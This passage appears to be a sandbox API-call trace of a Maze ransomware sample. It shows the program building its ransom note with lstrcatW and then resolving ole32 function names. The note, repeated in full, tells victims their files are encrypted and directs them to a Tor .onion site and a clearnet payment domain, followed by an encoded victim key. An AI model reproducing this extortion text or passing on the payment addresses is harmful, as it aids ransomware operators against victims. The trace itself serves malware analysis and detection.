QVdxnH6m+Oe0fpWhk7xBvssGNw4coIY4J4rQx3e0Mda84GHHB8YQN4s5fsDhYijiQatKqvs+eaMdYiMFKqJV9DRoBkStGooClvOh2LwVMPe4aJufA2ECH4zkMHJRZUTqB/bHAacGN2baG8ivcwJsnYj2dsc93tzJDCkmxyIMqbtyqmTRJIvEv4K51A3dZDD2dvx/oHCjbIUfL9N9vr8vnejMVI2XJVafVhAs1C3/CUyOsrhrSH2/BaeNuSjCgEBQH3JVNd5wuQ6V+fFQjCmE23nFn/RXrWhl5gd5fiSFrvPREpiH+BeCGnpiTiTGjIHL7VAYhu7DQ6KVo54swkswxLclqpopQGLaeTCuh5D+OXiUsXA2Ygd3olJfrivH8eyrZPA/oLFa19eWWh1PQktd8D5NsrjvgYjNJqtOPsnyK2KvLeWbqUY9RYE3LD1IbT2UgH55Ehut6m83FzItZdf4gMoU8hRL4IpCCUHjWMANC6p8OMaCgYpUxKBqlhqCtV/ju2IlDJPGh2rx/+55q29Uk6N8I1nW6fSR8XpnoNMtsMWGmbfGiLJM5zs1TWLWKpZFsrdobiUUPRM5WnYBO0OphCz4Yc6H0wjragoiOQBjAGQAYQAwADkAZgAyADkAYwAzADUANABiADQAMgAAABCAYBoqNQBwADUATgByAEcASgBuADAAagBTACAASABBAEwAUABtAGMAeAB6AAAAIhRYAEQAVQBXAFQARgBPAE4ATwAAACoMbgBvAG4AZQB8AAAAMi5XAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsAAAAQih8AEMAXwBGAF8ANAA5ADcAMQAwADYALwA1ADIAMwA5ADcAOQB8AAAASABQQFiJCGCJCGiJCHD7otEIeAyAAQGKAQMyLjA=" [0051.698] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n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", lpString2="\r\n---END MAZE KEY---\r\n\r\n" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n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\r\n---END MAZE KEY---\r\n\r\n") returned="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n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\r\n---END MAZE KEY---\r\n\r\n" [0051.698] VirtualFree (lpAddress=0xf80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.705] GetTickCount () returned 0x1145a9f [0051.705] VirtualAlloc (lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x4) returned 0x460000 [0051.705] lstrlenW (lpString="1234567890qwertyuiopasdfghjklzxcvbnm") returned 36 [0051.705] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xf00000 [0051.706] VirtualAlloc (lpAddress=0x0, dwSize=0x4a, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0051.706] lstrcpyW (in: lpString1=0xf10000, lpString2="1234567890qwertyuiopasdfghjklzxcvbnm" | out: lpString1="1234567890qwertyuiopasdfghjklzxcvbnm") returned="1234567890qwertyuiopasdfghjklzxcvbnm" [0051.706] lstrcpyW (in: lpString1=0x460000, lpString2="jkbimi8" | out: lpString1="jkbimi8") returned="jkbimi8" [0051.706] lstrcatW (in: lpString1="jkbimi8", lpString2=".tmp" | out: lpString1="jkbimi8.tmp") returned="jkbimi8.tmp" [0051.706] VirtualFree (lpAddress=0xf00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.706] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.707] VirtualFree (lpAddress=0x3b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.723] lstrlenA (lpString="ole32.dll") returned 9 [0051.723] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0051.723] lstrlenA (lpString="BINDMONIKER") returned 11 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0051.723] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0051.723] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0051.723] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0051.723] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0051.723] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0051.723] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0051.723] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0051.723] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0051.723] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0051.723] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0051.723] lstrlenA (lpString="COBUILDVERSION") returned 14 [0051.723] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0051.724] lstrlenA (lpString="COCANCELCALL") returned 12 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0051.724] lstrlenA (lpString="COCOPYPROXY") returned 11 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0051.724] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0051.724] lstrlenA (lpString="COCREATEGUID") returned 12 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0051.724] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0051.724] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0051.724] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0051.724] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0051.724] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0051.724] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0051.724] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0051.724] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0051.724] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0051.724] lstrlenA (lpString="COFILETIMENOW") returned 13 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0051.724] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0051.724] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0051.724] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0051.724] lstrlenA (lpString="COFREELIBRARY") returned 13 [0051.724] lstrcpyA (in: lpString1=0xc9e500, 